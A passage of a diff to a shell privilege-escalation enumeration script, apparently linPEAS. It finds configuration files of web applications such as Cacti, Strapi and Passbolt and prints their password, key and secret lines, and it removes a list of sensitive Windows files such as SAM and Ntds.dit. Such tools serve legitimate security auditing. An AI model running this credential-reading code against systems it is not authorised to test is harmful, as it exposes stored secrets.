sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_SEEDDMS" ] || [ "$DEBUG" ]; then print_2title "Analyzing SeedDMS Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "seeddms*"; fi; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; find "$f" -name "settings.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "seeddms*"; fi; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,seeddms.*$,${SED_RED},"; find "$f" -name "settings.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_DDCLIENT" ] || [ "$DEBUG" ]; then print_2title "Analyzing Ddclient Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ddclient.conf"; fi; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ddclient.conf"; fi; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_SENTRY" ] || [ "$DEBUG" ]; then print_2title "Analyzing Sentry Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry$,${SED_RED},"; find "$f" -name "config.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry.conf.py"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sentry$,${SED_RED},"; find "$f" -name "config.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry.conf.py"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_STRAPI" ] || [ "$DEBUG" ]; then print_2title "Analyzing Strapi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environments"; fi; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" | sed -${E} "s,environments$,${SED_RED},"; find "$f" -name "custom.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "database.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "request.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "response.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "security.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "server.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environments"; fi; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,environments$,${SED_RED},"; find "$f" -name "custom.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "database.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "request.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "response.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "security.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "server.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_CACTI" ] || [ "$DEBUG" ]; then print_2title "Analyzing Cacti Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cacti"; fi; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" | sed -${E} "s,cacti$,${SED_RED},"; find "$f" -name "config.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "config.php.dist" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "installer.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "check_all_pages" | while read ff; do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cacti"; fi; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cacti$,${SED_RED},"; find "$f" -name "config.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "config.php.dist" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "installer.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "check_all_pages" | while read ff; do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_ROUNDCUBE" ] || [ "$DEBUG" ]; then print_2title "Analyzing Roundcube Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "roundcube"; fi; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" | sed -${E} "s,roundcube$,${SED_RED},"; find "$f" -name "config.inc.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "roundcube"; fi; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,roundcube$,${SED_RED},"; find "$f" -name "config.inc.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_PASSBOLT" ] || [ "$DEBUG" ]; then print_2title "Analyzing Passbolt Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "passbolt.php"; fi; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "passbolt.php"; fi; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_JETTY" ] || [ "$DEBUG" ]; then print_2title "Analyzing Jetty Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "jetty-realm.properties"; fi; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "jetty-realm.properties"; fi; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi @@ -3408,79 +4115,93 @@ fi if [ "$PSTORAGE_INTERESTING_LOGS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Interesting logs Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "error.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "error.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; fi -if [ "$PSTORAGE_WINDOWS_FILES" ] || [ "$DEBUG" ]; then - print_2title "Analyzing Windows Files Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"appcmd\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "appcmd.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"bash\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bash.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"datasources\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "datasources.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"default\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "default.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "default\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"drives\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "drives.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"groups\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "groups.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https-xampp\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https-xampp.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"iis6\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "iis6.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"index\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "index.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "index\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.cnf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ntuser\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ntuser.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"pagefile\.sys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pagefile.sys"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"printers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "printers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scclient.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scheduledtasks.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "security.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "server.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" 